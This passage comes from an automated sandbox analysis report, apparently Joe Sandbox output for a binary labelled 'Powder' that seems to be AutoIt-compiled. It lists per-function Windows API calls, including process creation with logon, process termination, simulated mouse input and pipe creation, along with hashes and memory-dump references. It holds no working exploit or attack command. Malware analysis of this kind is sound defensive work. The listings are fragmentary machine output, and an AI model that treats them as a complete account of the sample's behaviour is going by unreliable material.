                                                  • Opcode ID: 356348dd677c14a8648973d4e790b746a8ae5b575d82ddf15ccf84967d79fcc3
                                                  • Instruction ID: a875b7ccf3be6bf1d4aca3322fe102917f022c08df2c23a37453ef07abdeaa9d
                                                  • Opcode Fuzzy Hash: 356348dd677c14a8648973d4e790b746a8ae5b575d82ddf15ccf84967d79fcc3
                                                  • Instruction Fuzzy Hash: 2441B231104300AFD711DF25DC88FBA7BE8EB45364F1405AAFAA5AB2E1C7319889DB61
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00E7550C,?,?,00000000,00000001), ref: 00E77796
                                                    • Part of subcall function 00E7406C: GetWindowRect.USER32(?,?), ref: 00E7407F
                                                  • GetDesktopWindow.USER32 ref: 00E777C0
                                                  • GetWindowRect.USER32(00000000), ref: 00E777C7
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E777F9
                                                    • Part of subcall function 00E657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65877
                                                  • GetCursorPos.USER32(?), ref: 00E77825
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E77883
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 19c4bf04c77b97d4f81e23d1494885367b734e62d459920cf8ec363d382cb256
                                                  • Instruction ID: e0b1203507a5dba40889c021a8a88c6d449a9aaee17425c2f4eadb7f1cbdcad0
                                                  • Opcode Fuzzy Hash: 19c4bf04c77b97d4f81e23d1494885367b734e62d459920cf8ec363d382cb256
                                                  • Instruction Fuzzy Hash: F731E172608315AFD724DF14D849F9BB7E9FF88314F00591AF599A7181CB30E918CBA2
                                                  APIs
                                                    • Part of subcall function 00E58CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E58CDE
                                                    • Part of subcall function 00E58CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E58CE8
                                                    • Part of subcall function 00E58CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E58CF7
                                                    • Part of subcall function 00E58CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E58CFE
                                                    • Part of subcall function 00E58CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E58D14
                                                  • GetLengthSid.ADVAPI32(?,00000000,00E5904D), ref: 00E59482
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E5948E
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00E59495
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E594AE
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00E5904D), ref: 00E594C2
                                                  • HeapFree.KERNEL32(00000000), ref: 00E594C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: 21b798c417d52553bc556eb0e7795a3a7420b4dd3ea92e054caf40398bcbe4c5
                                                  • Instruction ID: 8052b59e94b4ad46bab7b1945d35a318afc540d50df9da070f75399f0edfbc54
                                                  • Opcode Fuzzy Hash: 21b798c417d52553bc556eb0e7795a3a7420b4dd3ea92e054caf40398bcbe4c5
                                                  • Instruction Fuzzy Hash: 9D11CD32501204EFDB108BA5CC49BEE7BAAEB41316F10881AEC51E3211C7359D09CB60
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E59200
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00E59207
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E59216
                                                  • CloseHandle.KERNEL32(00000004), ref: 00E59221
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E59250
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E59264
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 522c79eff8585e7769bd32daf7c81ce216636965fccc86cbf2ad75cb03e9f3ef
                                                  • Instruction ID: f672d05b2294623a471fa025623200d486f465d6cf720eeed2b8733838e13041
                                                  • Opcode Fuzzy Hash: 522c79eff8585e7769bd32daf7c81ce216636965fccc86cbf2ad75cb03e9f3ef
                                                  • Instruction Fuzzy Hash: 2F11477250120AEFDF018FA4ED49BDE7BA9EB08319F044416FE04B2161D3729D68EB60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00E5C34E
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E5C35F
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E5C366
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00E5C36E
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E5C385
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00E5C397
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: 3f8a19af9f3e8cbef4a2c3aa834390262d47412ddc17bbab715c3c1793fb3853
                                                  • Instruction ID: 408cce52dc05eb808b7c3c47905e0d767fca9299c07a7554dcb11ce3e8cc88ad
                                                  • Opcode Fuzzy Hash: 3f8a19af9f3e8cbef4a2c3aa834390262d47412ddc17bbab715c3c1793fb3853
                                                  • Instruction Fuzzy Hash: 97012175E00318BFEB109BA69C49A5ABFB8EF48751F1044A6FE04B7281D6709914CFA0
                                                  APIs
                                                    • Part of subcall function 00E016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E01729
                                                    • Part of subcall function 00E016CF: SelectObject.GDI32(?,00000000), ref: 00E01738
                                                    • Part of subcall function 00E016CF: BeginPath.GDI32(?), ref: 00E0174F
                                                    • Part of subcall function 00E016CF: SelectObject.GDI32(?,00000000), ref: 00E01778
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E8C57C
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00E8C590
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E8C59E
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00E8C5AE
                                                  • EndPath.GDI32(00000000), ref: 00E8C5BE
                                                  • StrokePath.GDI32(00000000), ref: 00E8C5CE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: 3ca7f244678d9e79ee0b33528ffae5702d36021bc80148aa155f26454d3ed384
                                                  • Instruction ID: e9aded28c563322b349293bff1f6220e3302cde0f19caec7c4775899ac50839f
                                                  • Opcode Fuzzy Hash: 3ca7f244678d9e79ee0b33528ffae5702d36021bc80148aa155f26454d3ed384
                                                  • Instruction Fuzzy Hash: E7110C7200411CBFDF029F91DC48EAA7FADEB04354F048462BA586A160C771AE59DBA0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E207EC
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E207F4
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E207FF
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E2080A
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E20812
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2081A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 0b45bbf00cd17ba195470109922d18ae3cd7e85b2bcf947c480f4efc2dc4448a
                                                  • Instruction ID: 9c4110ea8bb6ceaf5ab75f9f8197f12a2e85e95060c6a58dd3eee2e5ff4f93e8
                                                  • Opcode Fuzzy Hash: 0b45bbf00cd17ba195470109922d18ae3cd7e85b2bcf947c480f4efc2dc4448a
                                                  • Instruction Fuzzy Hash: 5D016CB09017597DE3008F5A8C85B52FFB8FF59354F00411BA15C47942C7F5A868CBE5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E659B4
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E659CA
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00E659D9
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E659E8
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E659F2
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E659F9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 25921099f5fe444a7533a31ce1c8961ec66f5070c0eac55c38b5a8ca8296913d
                                                  • Instruction ID: 167a0c7c597b7073c086c1a0439bb65d38a257f36b8f745164ab5fdf41fbe1be
                                                  • Opcode Fuzzy Hash: 25921099f5fe444a7533a31ce1c8961ec66f5070c0eac55c38b5a8ca8296913d
                                                  • Instruction Fuzzy Hash: C4F03032241158BFE7215B939C0DEEF7B7CEFC6B11F40015BFA05A1051D7A01A1587B5
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00E677FE
                                                  • EnterCriticalSection.KERNEL32(?,?,00E0C2B6,?,?), ref: 00E6780F
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00E0C2B6,?,?), ref: 00E6781C
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E0C2B6,?,?), ref: 00E67829
                                                    • Part of subcall function 00E671F0: CloseHandle.KERNEL32(00000000,?,00E67836,?,00E0C2B6,?,?), ref: 00E671FA
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E6783C
                                                  • LeaveCriticalSection.KERNEL32(?,?,00E0C2B6,?,?), ref: 00E67843
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 2e74a2efde942af47c39939720b595995d6bdce5f6a2c3bf2cd0d0ff168d6dc3
                                                  • Instruction ID: 83a3791f71ed1a6764f52099c6ea34f4a4be92c683eba907a3b4294aa2e9e567
                                                  • Opcode Fuzzy Hash: 2e74a2efde942af47c39939720b595995d6bdce5f6a2c3bf2cd0d0ff168d6dc3
                                                  • Instruction Fuzzy Hash: 99F05E32185212AFD7112B65EC8CAAB7769FF45306B941423F102B50B6CBB65809CB60
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E59555
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00E59561
                                                  • CloseHandle.KERNEL32(?), ref: 00E5956A
                                                  • CloseHandle.KERNEL32(?), ref: 00E59572
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E5957B
                                                  • HeapFree.KERNEL32(00000000), ref: 00E59582
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 7c030de7bbf433db674d0d9bc70e243cb0ef02bd7583dfec53315f134a89ee46
                                                  • Instruction ID: f895a076ffb860ca888f788c40a7654c349bb0429b17577161cf183e549f1e93
                                                  • Opcode Fuzzy Hash: 7c030de7bbf433db674d0d9bc70e243cb0ef02bd7583dfec53315f134a89ee46
                                                  • Instruction Fuzzy Hash: 8DE05276104505BFDA416BE7EC0C95ABB69FF49722B904623F219A1470CB32A469DB50
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00E78CFD
                                                  • CharUpperBuffW.USER32(?,?), ref: 00E78E0C
                                                  • VariantClear.OLEAUT32(?), ref: 00E78F84
                                                    • Part of subcall function 00E67B1D: VariantInit.OLEAUT32(00000000), ref: 00E67B5D
                                                    • Part of subcall function 00E67B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00E67B66
                                                    • Part of subcall function 00E67B1D: VariantClear.OLEAUT32(00000000), ref: 00E67B72
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: 34bd12030af0a007b870d6c34797f5b3f52de124e49a18d430b2804a4d895ec4
                                                  • Instruction ID: 1d9fc773430f8dd97c64def1b5fefbca769f20f2b833c7cc247e09dafe4d6d18
                                                  • Opcode Fuzzy Hash: 34bd12030af0a007b870d6c34797f5b3f52de124e49a18d430b2804a4d895ec4
                                                  • Instruction Fuzzy Hash: 8B91CE706043019FC714DF24C98489ABBF5EF99344F14996EF98AAB3A2DB30E945CB52
                                                  APIs
                                                    • Part of subcall function 00E1436A: _wcscpy.LIBCMT ref: 00E1438D
                                                  • _memset.LIBCMT ref: 00E6332E
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E6335D
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E63410
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E6343E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: a338be3f62e466715b8b1c83bf5b80b0162e56490b2b91e1738419f01255a592
                                                  • Instruction ID: 9b242380f7ae8169d1496074282e5cf7d99cfc4e53593cc502903f0230d39e1b
                                                  • Opcode Fuzzy Hash: a338be3f62e466715b8b1c83bf5b80b0162e56490b2b91e1738419f01255a592
                                                  • Instruction Fuzzy Hash: 3C51D1316883009FD7159E38E845A6BB7E4EF457A8F04252EF8A1F22E1DB30CE44CB52
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E62F67
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E62F83
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00E62FC9
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC7890,00000000), ref: 00E63012
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: af1ab4693027fd4dfb98232cce2df5b618d34a2bfe11030be8eca0c5a1ddf585
                                                  • Instruction ID: e233fa601115d03e9abf84839fa63816e35cee0ab9918904e91fc6b9416e23f8
                                                  • Opcode Fuzzy Hash: af1ab4693027fd4dfb98232cce2df5b618d34a2bfe11030be8eca0c5a1ddf585
                                                  • Instruction Fuzzy Hash: B841C3312443419FD720DF24E884B5ABBE4EF84394F146A1EF5A5B72D1DB70EA09CB62
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E5B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E5B7BD
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E59ACC
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E59ADF
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E59B0F
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: 91b1858da3d98856a6e66ff74ad3cb9128baee143b29f2258f0c52a9f43a7edd
                                                  • Instruction ID: d036f6ebc74c0915ad8385f88b955715c6b6f9f5f34ea9d89f29726ecfc7b196
                                                  • Opcode Fuzzy Hash: 91b1858da3d98856a6e66ff74ad3cb9128baee143b29f2258f0c52a9f43a7edd
                                                  • Instruction Fuzzy Hash: 7E21F671901104BEDB14EBA0DC45DFFB7B8DF45350F10651AFD25B72D2DB3449499660
                                                  APIs
                                                    • Part of subcall function 00E02111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E0214F
                                                    • Part of subcall function 00E02111: GetStockObject.GDI32(00000011), ref: 00E02163
                                                    • Part of subcall function 00E02111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E0216D
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E86A86
                                                  • LoadLibraryW.KERNEL32(?), ref: 00E86A8D
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E86AA2
                                                  • DestroyWindow.USER32(?), ref: 00E86AAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 91e9cdfde69232a8a2148f452bb5797d0d7e216d88554fcbd1af3be3d7c9c674
                                                  • Instruction ID: 3b44dba054026ac6feed8503183f4ebc9ec8592ed381883f6d2b2a9dcf38fe16
                                                  • Opcode Fuzzy Hash: 91e9cdfde69232a8a2148f452bb5797d0d7e216d88554fcbd1af3be3d7c9c674
                                                  • Instruction Fuzzy Hash: 0021F071200205AFEF14AF64DC81EBB37ACEF49368F50A65AFA5CB21A0D331CC519760
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00E67377
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E673AA
